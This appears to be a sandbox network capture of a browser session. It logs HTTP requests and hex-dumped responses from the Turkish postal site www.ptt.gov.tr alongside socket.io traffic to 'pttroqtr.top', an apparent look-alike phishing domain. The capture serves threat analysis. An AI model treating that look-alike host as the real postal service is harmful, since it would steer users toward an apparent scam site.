                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 69 64 20 30 21 3d 3d 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3f 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3a 75 7d 2c 38 36 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 34 36 36 29 2c 6f 3d 6e 28 35 32 35 32 29 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3f 4f 62 6a 65 63 74 2e 69 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 30 21 3d 3d 65 7c 7c 31 2f 65 3d 3d 3d 31 2f 74 29 7c 7c 65 21 3d 3d 65 26 26 74 21 3d 3d 74 7d 2c 69 3d 6f 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 2c 63 3d 72 2e 75 73 65 52
                                                                                                                                                                                            Data Ascii: id 0!==r.useSyncExternalStore?r.useSyncExternalStore:u},8667:function(e,t,n){"use strict";var r=n(2466),o=n(5252);var a="function"===typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e===1/t)||e!==e&&t!==t},i=o.useSyncExternalStore,c=r.useR
                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 2e 43 4f 4e 53 54 41 4e 54 29 2c 4f 4e 4c 49 4e 45 5f 54 52 41 4e 53 41 43 54 49 4f 4e 53 3a 22 31 61 33 63 34 34 66 66 2d 37 62 61 62 2d 34 37 61 30 2d 62 31 31 31 2d 38 37 32 65 65 64 65 30 66 35 65 33 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 45 52 56 49 43 45 53 3a 22 66 39 39 62 39 33 33 30 2d 36 39 31 35 2d 34 65 36 39 2d 61 38 38 64 2d 33 33 39 65 31 39 30 37 36 64 65 66 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 43 55 53 54 4f 4d 5f 53 45 52 56 49 43 45 53 5f 50 4f 53 54 3a 22 62 39 35 63 66 38 31 38 2d 33 65 32 33 2d 34 31 61 38 2d 62 65 35 39 2d 36 31 32 32 37 35 30 32 65 62 38 63 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 43 55 53 54 4f 4d 5f 53 45 52 56 49 43 45 53 5f 42
                                                                                                                                                                                            Data Ascii: .CONSTANT),ONLINE_TRANSACTIONS:"1a3c44ff-7bab-47a0-b111-872eede0f5e3*".concat(a.CONSTANT),SERVICES:"f99b9330-6915-4e69-a88d-339e19076def*".concat(a.CONSTANT),CUSTOM_SERVICES_POST:"b95cf818-3e23-41a8-be59-61227502eb8c*".concat(a.CONSTANT),CUSTOM_SERVICES_B
                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 45 4e 54 41 54 49 4f 4e 5f 54 4f 5f 43 55 53 54 4f 4d 53 5f 46 45 45 3a 22 32 64 65 63 62 32 37 35 2d 33 30 37 39 2d 34 32 39 66 2d 39 61 31 61 2d 64 66 35 35 35 35 63 35 63 65 65 62 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 54 5f 4f 56 45 52 53 45 41 53 5f 52 45 54 55 52 4e 5f 46 45 45 3a 22 37 63 36 34 62 34 66 66 2d 65 32 62 34 2d 34 66 35 33 2d 39 61 30 64 2d 65 33 33 62 33 39 31 38 63 36 30 31 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 54 5f 50 41 59 4d 45 4e 54 5f 54 45 52 4d 5f 46 45 45 3a 22 32 62 33 37 64 32 34 62 2d 37 61 61 61 2d 34 30 62 32 2d 61 32 33 65 2d 62 63 32 39 65 37 39 61 66 37 30 61 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 54 5f 54 4f 54 41 4c 3a 22 66
                                                                                                                                                                                            Data Ascii: ENTATION_TO_CUSTOMS_FEE:"2decb275-3079-429f-9a1a-df5555c5ceeb*".concat(a.CONSTANT),ST_OVERSEAS_RETURN_FEE:"7c64b4ff-e2b4-4f53-9a0d-e33b3918c601*".concat(a.CONSTANT),ST_PAYMENT_TERM_FEE:"2b37d24b-7aaa-40b2-a23e-bc29e79af70a*".concat(a.CONSTANT),ST_TOTAL:"f


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            127192.168.2.549854185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:41 UTC385OUTGET /_next/static/chunks/webpack-45e080b2c6cac5da.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:42 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"102b-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:41 GMT
                                                                                                                                                                                            Content-Length: 4139
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:42 UTC4139INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 76 61 72 20 6f 3d 74 5b 72 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 75 3d 74 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 69 3d 21 30 3b 74 72 79 7b 65 5b 72 5d 2e 63 61 6c 6c 28 75 2e 65 78 70 6f 72 74 73 2c 75 2c 75 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 69 26 26 64 65 6c 65 74 65 20 74 5b 72 5d 7d 72 65 74 75 72 6e 20 75 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 6e 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 2c 75 29
                                                                                                                                                                                            Data Ascii: !function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u)


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            128192.168.2.5498568.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:41 UTC549OUTGET /socket.io/?EIO=4&transport=websocket&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: Upgrade
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Upgrade: websocket
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-WebSocket-Version: 13
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Sec-WebSocket-Key: 6rgGU/d4mNfxc4Rf8QarNQ==
                                                                                                                                                                                            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                            2024-09-28 03:39:42 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:42 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:42 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            129192.168.2.5498588.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:41 UTC380OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjd67 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:42 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:42 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 118
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:42 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 69 5f 4b 59 79 42 6e 4f 51 4a 6c 34 45 5a 6f 74 41 45 66 37 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                            Data Ascii: 0{"sid":"i_KYyBnOQJl4EZotAEf7","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            130192.168.2.5498558.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:41 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjdTi&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:41 UTC2OUTData Raw: 34 30
                                                                                                                                                                                            Data Ascii: 40
                                                                                                                                                                                            2024-09-28 03:39:42 UTC198INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:42 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:42 UTC2INData Raw: 6f 6b
                                                                                                                                                                                            Data Ascii: ok


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            131192.168.2.5498578.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:41 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjdTo&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:42 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:42 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 32
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:42 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 6d 56 39 54 76 38 38 6c 36 55 39 7a 50 43 6f 4c 41 45 66 38 22 7d
                                                                                                                                                                                            Data Ascii: 40{"sid":"mV9Tv88l6U9zPCoLAEf8"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            132192.168.2.549859185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC607OUTGET /_next/static/3nPo4dxLHf5a0RshtsAsa/_buildManifest.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:42 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"2039-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:41 GMT
                                                                                                                                                                                            Content-Length: 8249
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:42 UTC6873INData Raw: 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 61 2c 73 2c 74 2c 72 2c 63 2c 6e 2c 64 2c 75 2c 6f 2c 67 2c 70 2c 6c 2c 6d 2c 68 2c 6b 2c 66 2c 62 2c 6a 2c 79 2c 46 2c 50 2c 5f 2c 49 29 7b 72 65 74 75 72 6e 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 69 2c 61 2c 73 2c 74 2c 72 2c 22 73 74 61 74 69 63 2f 63 73 73 2f 32 34 32 35 63 62 61 31 30 64 65 31 36 34 35 62 2e 63 73 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 69 6e 64 65 78 2d 38 31 62 65 62 64 36 35 36 39 38 63 38 34 31 35 2e 6a 73 22 5d 2c 22 2f 5f 65 72 72 6f 72 22 3a 5b 22 73 74
                                                                                                                                                                                            Data Ascii: self.__BUILD_MANIFEST=function(e,i,a,s,t,r,c,n,d,u,o,g,p,l,m,h,k,f,b,j,y,F,P,_,I){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[i,a,s,t,r,"static/css/2425cba10de1645b.css","static/chunks/pages/index-81bebd65698c8415.js"],"/_error":["st
                                                                                                                                                                                            2024-09-28 03:39:42 UTC1376INData Raw: 2f 79 75 72 74 2d 64 69 73 69 2f 46 6f 72 65 69 67 6e 50 72 69 6e 74 65 64 50 61 70 65 72 22 2c 22 2f 67 6f 6e 64 65 72 69 2d 75 63 72 65 74 69 2d 68 65 73 61 70 6c 61 6d 61 2f 6d 65 6b 74 75 70 2d 70 6f 73 74 61 73 69 2d 67 6f 6e 64 65 72 69 6c 65 72 69 2f 79 75 72 74 2d 64 69 73 69 2f 46 6f 72 65 69 67 6e 53 6d 61 6c 6c 50 61 63 6b 22 2c 22 2f 67 6f 6e 64 65 72 69 2d 75 63 72 65 74 69 2d 68 65 73 61 70 6c 61 6d 61 2f 6d 65 6b 74 75 70 2d 70 6f 73 74 61 73 69 2d 67 6f 6e 64 65 72 69 6c 65 72 69 2f 79 75 72 74 2d 64 69 73 69 2f 46 6f 72 65 69 67 6e 54 75 72 70 65 78 22 2c 22 2f 67 6f 6e 64 65 72 69 2d 75 63 72 65 74 69 2d 68 65 73 61 70 6c 61 6d 61 2f 74 65 6c 67 72 61 66 2d 67 6f 6e 64 65 72 69 6c 65 72 69 2f 54 65 6c 65 67 72 61 6d 22 2c 22 2f 68 61 62
                                                                                                                                                                                            Data Ascii: /yurt-disi/ForeignPrintedPaper","/gonderi-ucreti-hesaplama/mektup-postasi-gonderileri/yurt-disi/ForeignSmallPack","/gonderi-ucreti-hesaplama/mektup-postasi-gonderileri/yurt-disi/ForeignTurpex","/gonderi-ucreti-hesaplama/telgraf-gonderileri/Telegram","/hab


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            133192.168.2.549862185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC607OUTGET /_next/static/chunks/pages/_error-32d9baaae5c99c79.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:42 UTC396INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"25e-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:41 GMT
                                                                                                                                                                                            Content-Length: 606
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:42 UTC606INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 38 32 30 5d 2c 7b 32 39 30 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 5f 65 72 72 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 36 39 35 33 29 7d 5d 29 7d 2c 36 39 35 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 6e 29 3b 76 61 72 20 75 3d 72 28 33 32 38 38 29 2c 65 3d 72 28 38 30 33 32 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 76 61 72 20 6e 3d 74
                                                                                                                                                                                            Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4820],{2904:function(t,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_error",function(){return r(6953)}])},6953:function(t,n,r){"use strict";r.r(n);var u=r(3288),e=r(8032);function s(t){var n=t


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            134192.168.2.549860185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC605OUTGET /_next/static/3nPo4dxLHf5a0RshtsAsa/_ssgManifest.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:42 UTC394INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:45 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"60-191e5a81a88"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:42 GMT
                                                                                                                                                                                            Content-Length: 96
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:42 UTC96INData Raw: 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 28 5b 22 5c 75 30 30 32 46 6e 6f 74 66 6f 75 6e 64 22 5d 29 3b 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29
                                                                                                                                                                                            Data Ascii: self.__SSG_MANIFEST=new Set(["\u002Fnotfound"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            135192.168.2.549861185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC612OUTGET /_next/static/3nPo4dxLHf5a0RshtsAsa/_middlewareManifest.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
